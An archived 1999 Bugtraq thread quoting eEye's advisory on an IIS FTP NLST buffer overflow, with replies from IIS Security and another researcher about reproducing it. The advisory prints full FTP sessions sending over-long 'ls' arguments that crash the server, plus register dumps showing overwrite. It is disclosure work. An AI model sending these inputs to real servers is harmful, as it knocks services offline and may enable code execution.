Re: Advisory: IIS FTP Exploit/DoS Attack

From: Michael Howard (mikehowat_private)
Date: Mon Jan 25 1999 - 15:59:46 PST

Next message: mnemonix: "IIS 4 Advisory - ExAir sample site DoS"

Previous message: Wietse Venema: "Repost: Wietse's FTP site has moved"
Maybe in reply to: Marc: "Advisory: IIS FTP Exploit/DoS Attack"
Next in thread: Matt Conover: "Re: Advisory: IIS FTP Exploit/DoS Attack"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

we finally have a repro at this end!! we're looking at it now... many thanks
to marc for helping us work out a scenario....

Cheers, MH
IIS Security


-----Original Message-----
From: mnemonix [mailto:mnemonixat_private]
Sent: Monday, January 25, 1999 4:08 PM
To: BUGTRAQat_private
Subject: Re: Advisory: IIS FTP Exploit/DoS Attack


I couldn't repro this on NT 4 Server IIS4 (installed from NT 4 Option pack)
with service Pack 3 - no hotfixes.
Cheers,
Mnemonix

-----Original Message-----
From: Marc <Marcat_private>
To: BUGTRAQat_private <BUGTRAQat_private>
Date: Sunday, January 24, 1999 11:30 PM
Subject: Advisory: IIS FTP Exploit/DoS Attack


>________________________________________________________________________
>
>eEye Digital Security Team <e>
>www.eEye.com
>infoat_private
>Sunday, January 24, 1999
>________________________________________________________________________
>
>Advisory:
>IIS Remote FTP Exploit/DoS Attack
>
>Systems Tested:
>Windows NT 4.0 (SP4) IIS 3.0 / 4.0
>Windows 95/98 PWS 1.0
>
>Release Date:
>Sunday, January 24, 1999
>
>Advisory Code:
>IISE01
>________________________________________________________________________
>
>Description:
>________________________________________________________________________
>
>While feeding in logic into Retina's artificial intelligence engine,
>which helps construct query strings to pass to internet servers,
>checking for overflow bugs and miss parsing of command strings. Our test
>server stopped responding. Below is our findings.
>
>Microsoft IIS (Internet Information Server) FTP service contains a
>buffer overflow in the NLST command. This could be used to DoS a remote
>machine and in some cases execute code remotely.
>
>Lets look at the following example attack. [Comments are in brackets.]
>
>The server must either have anonymous access rights or an attacker must
>have an account.
>
>C:\>ftp guilt.xyz.com
>Connected to guilt.xyz.com.
>220 GUILT Microsoft FTP Service (Version 4.0).
>User (marc.xyz.com:(none)): ftp
>331 Anonymous access allowed, send identity (e-mail name) as password.
>Password:
>230 Anonymous user logged in.
>
>ftp> ls AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
>200 PORT command successful.
>150 Opening ASCII mode data connection for file list.
>[The server has now processed our long NLST request and has crashed]
>-> ftp: get :Connection reset by peer
>[Our ftp client looses connection... that is a given]
>
>The above example uses 316 characters to overflow. This is the smallest
>possible buffer to pass that will overflow IIS. Lets take a look at the
>server side happenings.
>
>On the server side we have an "Application Error" message for
>inetinfo.exe. "The instruction at '0x710f8aa2' referenced memory at
>'0x41414156'. The memory could not be 'read'."
>
>If we take a look at our registers we will see the following:
>
>EAX = 0000005C EBX = 00000001
>ECX = 00D3F978 EDX = 002582DD
>ESI = 00D3F978 EDI = 00000000
>EIP = 710F8AA2 ESP = 00D3F644
>EBP = 00D3F9F0 EFL = 00000206
>
>There is no 41 hex (Our overflow character) in any of our registers so
>we chalk this up as a DoS attack for now.
>
>Lets move on and take a look at the largest string we can pass to
>overflow IIS.
>
>C:\>ftp guilt.xyz.com
>Connected to guilt.xyz.com.
>220 GUILT Microsoft FTP Service (Version 4.0).
>User (marc.xyz.com:(none)): ftp
>331 Anonymous access allowed, send identity (e-mail name) as password.
>Password:
>230 Anonymous user logged in.
>[The server must either have anonymous access rights or an attacker must
>have an account]
>
>ftp> ls AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>AAAAAAAAA
>
>200 PORT command successful.
>150 Opening ASCII mode data connection for file list.
>Connection closed by remote host.
>
>In this case we passed 505 characters to overflow IIS. This is the
>largest possible (tested) buffer to pass that will overflow IIS. Lets
>take a look once again at the server side.
>
>On the server we have the same "Application Error" message for
>inetinfo.exe except this time "The instruction at '0x722c9262'
>referenced memory at "0x41414141'." This is looking mighty interesting.
>Lets look at our registers once again:
>
>EAX = 00000000 EBX = 41414141
>ECX = 41414141 EDX = 722C1CAC
>ESI = 41414141 EDI = 41414141
>EIP = 722C9262 ESP = 00D3F524
>EBP = 00D3F63C EFL = 00000246
>
>There sure are a lot of 41 hex codes in our registers now. >:-]
>
>So to wrap it all up what we have here is a DoS attack against any IIS
>server with ftp access. Keep in mind we have to be able to login.
>However, Anonymous access is granted on most servers. Once we have
>overflowed IIS all IIS services will fail. (I.E. The web service, NNTP,
>SMTP etc..) What we have seems to be a very interesting buffer overflow.
>
>________________________________________________________________________
>
>Special Thanks
>________________________________________________________________________
>
>The eEye Digital Security Team would like to extend a special thanks to
>Mudge and Dildog.
>
>________________________________________________________________________
>
>Copyright (c) 1999 eEye Digital Security Team
>________________________________________________________________________
>
>Permission is hereby granted for the redistribution of this alert
>electronically. It is not to be edited in any way without express
>consent of eEye. If you wish to reprint the whole or any part of this
>alert in any other medium excluding electronic medium, please e-mail
>alertat_private for permission.
>
>________________________________________________________________________
>
>Disclaimer:
>________________________________________________________________________
>
>The information within this paper may change without notice. Use of this
>information constitutes acceptance for use in an AS IS condition. There
>are NO warranties with regard to this information. In no event shall the
>author be liable for any damages whatsoever arising out of or in
>connection with the use or spread of this information. Any use of this
>information is at the user's own risk.
>
>Please send suggestions, updates, and comments to: alertat_private
>
>eEye Digital Security Team
>http://www.eEye.com
>infoat_private
>________________________________________________________________________
>

Next message: mnemonix: "IIS 4 Advisory - ExAir sample site DoS"
Previous message: Wietse Venema: "Repost: Wietse's FTP site has moved"
Maybe in reply to: Marc: "Advisory: IIS FTP Exploit/DoS Attack"
Next in thread: Matt Conover: "Re: Advisory: IIS FTP Exploit/DoS Attack"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:30:53 PDT